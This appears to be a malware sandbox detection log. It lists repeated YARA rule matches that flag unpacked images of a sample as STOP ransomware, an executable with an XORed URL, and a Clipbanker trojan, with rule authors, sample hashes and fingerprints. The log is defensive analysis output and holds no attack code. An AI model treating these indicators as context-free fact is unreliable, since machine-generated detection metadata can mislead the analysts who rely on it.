Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
